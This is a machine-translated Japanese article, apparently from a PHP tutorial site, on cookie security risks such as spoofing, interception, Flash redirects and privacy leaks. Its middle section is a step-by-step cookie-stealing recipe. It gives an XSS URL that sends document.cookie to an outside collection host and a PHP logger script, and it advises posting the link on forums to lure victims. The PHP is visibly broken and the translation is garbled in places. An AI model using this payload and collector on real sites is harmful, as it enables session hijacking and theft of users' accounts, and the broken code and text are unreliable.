ホームページ  >  記事  >  ウェブフロントエンド  >  Cookie のセキュリティ問題の詳細な分析_cookies

Cookie のセキュリティ問題の詳細な分析_cookies

WBOY
WBOYオリジナル
2016-05-16 16:12:071639ブラウズ

Cookie の目的は、ユーザーに利便性をもたらし、Web サイトに価値を加えることであり、通常の状況では、重大なセキュリティ上の脅威を引き起こすことはありません。 Cookie ファイルはコードとして実行できず、ウイルスを送信することもできません。Cookie ファイルはユーザーに固有のものであり、それを作成したサーバーのみが読み取ることができます。さらに、ブラウザでは通常 300 個の Cookie しか保存できませんが、各サイトでは最大 20 個の Cookie を保存できます。そのため、Cookie がハード ディスクをいっぱいにすることはなく、使用されません。 「サービス拒否」攻撃を意味します。

しかし、Cookie のセキュリティはユーザー ID の代わりにシステム全体のセキュリティを決定する場合があり、Cookie のセキュリティ問題は無視できません。

(1) Cookie のなりすまし Cookie にはユーザーのアカウント ID やパスワードなどの情報が記録されており、通常、オンラインで送信される前に MD5 方式で暗号化されます。たとえインターネット上で暗号化された情報が悪意を持った人たちに傍受されても、内容を理解することはできません。ただし、ここでの問題は、Cookie を傍受する人がこれらの文字列の意味を知る必要がなく、他人の Cookie をサーバーに送信して検証に合格できる限り、被害者のふりをしてログを記録できることです。この動作は Cookie チートと呼ばれます。
不正なユーザーは、Cookie を騙すことによって対応する暗号化キーを取得し、それにより、ユーザーの電子メールやアカウント情報を含む正規ユーザーのすべての個人情報にアクセスし、個人情報に重大な損害を与えます。
(2) Cookie インターセプト
Cookie はブラウザとサーバー間でプレーン テキストの形式で送信されるため、他人が簡単に不正に傍受して使用する可能性があります。 Cookie は、Web 通信を傍受できる人であれば誰でも読み取ることができます。
Cookie が不正なユーザーによって傍受され、有効期間内に再生されると、不正なユーザーは合法的なユーザーの権利を享受します。たとえば、オンラインで読む場合、違法ユーザーは料金を支払うことなく電子雑誌をオンラインで読むことができます。

Cookie インターセプト方法 には次のものが含まれます:

(1) プログラミングを使用して Cookie を傍受します。この方法は 2 つのステップで完了します。

ステップ 1: Cookie を収集する必要がある Web サイトを特定し、分析して URL を構築します。 まず、Cookie を収集する Web サイト (http://www.XXX.net) を開き、ユーザー名「」を入力してデータを分析します。パケットをキャプチャして、次のコードを取得します:
http://www.XXX.net/tXl/login/login.pl?ユーザー名=&passwd=&ok.X=28&ok.y=6;
」を
に置き換えます。 "<script>alert(document.cookie)</script>" 実行が成功した場合は、URL の構築を開始します:
http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
このうち http://www.cbifamily.org/cbi.php は、ユーザーが制御できる特定のホスト上のスクリプトです。 「」はスペースとして扱われるため、「+」は記号「」の URL エンコードであることに注意してください。 URL をフォーラムに投稿して、他の人にクリックさせることができます。

ステップ 2: Cookie を収集する PHP スクリプトを準備し、ユーザーが制御できる Web サイトに配置します。何も知らない人が構築された URL をクリックすると、PHP コードが実行されます。スクリプトの具体的な内容は次のとおりです:

コードをコピーします コードは次のとおりです:

$info=getenv("OUERY_STRING"); if($info){
$fp=fopen("info.tXt","a"); fwrite($fp,!info."n"); fclose($fp);

header("場所:http://www.XXX.net");
?>

このコードをネットワーク上に置くと、全員の Cookie を収集できます。フォーラムで HTML コードが許可されている場合、または Flash タグの使用が許可されている場合は、これらのテクノロジーを使用して Cookie コードを収集してフォーラムに配置し、投稿に魅力的なトピックを与えて興味深いコンテンツを作成すると、すぐに大量の情報を収集できます。クッキーの。フォーラムでは、多くの人のパスワードがこの方法で盗まれました。
(2) Flash コードの隠れた危険性を利用して Cookie を傍受します。 Flash には getURL() 関数があります。 Flash はこの機能を使用して指定された Web ページを自動的に開くことができ、これによりユーザーが悪意のあるコードを含む Web サイトに誘導される可能性があります。たとえば、ユーザーがコンピュータで Flash アニメーションを楽しんでいる場合、アニメーション フレーム内のコードが静かにインターネットに接続され、特別なコードを含む非常に小さなページが開かれる可能性があります。このページは Cookie を収集し、その他の有害な行為を行う可能性があります。もの。これは Flash ファイルの内部機能であるため、Web サイトは Flash のこれを防ぐことはできません。
(3) Cookie によりネットワークのプライバシーが漏洩
Cookie がオンライン プライバシーの漏洩を引き起こす主な理由は次のとおりです。 商業的利益によるもの。電子商取引の台頭とインターネット上での巨大なビジネスチャンスの出現に伴い、一部の Web サイトや機関は Cookie を悪用し、検索エンジン技術、データマイニング技術、さらにはネットワーク欺瞞技術を使用して、訪問者の許可なしに他人の個人情報を収集しています。ユーザーのデータベース構築、広告、その他の営利目的のため、ユーザーの個人プライバシーが漏洩する可能性があります。 「Cookie情報送信のオープン性。Cookieファイルには特殊な送信プロセスとテキスト特性があります。サーバーとクライアント間で安全に暗号化されていないCookie-ieファイルを送信すると、簡単に個人情報の漏洩につながる可能性があります。

上記は Cookie のセキュリティについての私の個人的な理解です。不足がある場合は修正してください。

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。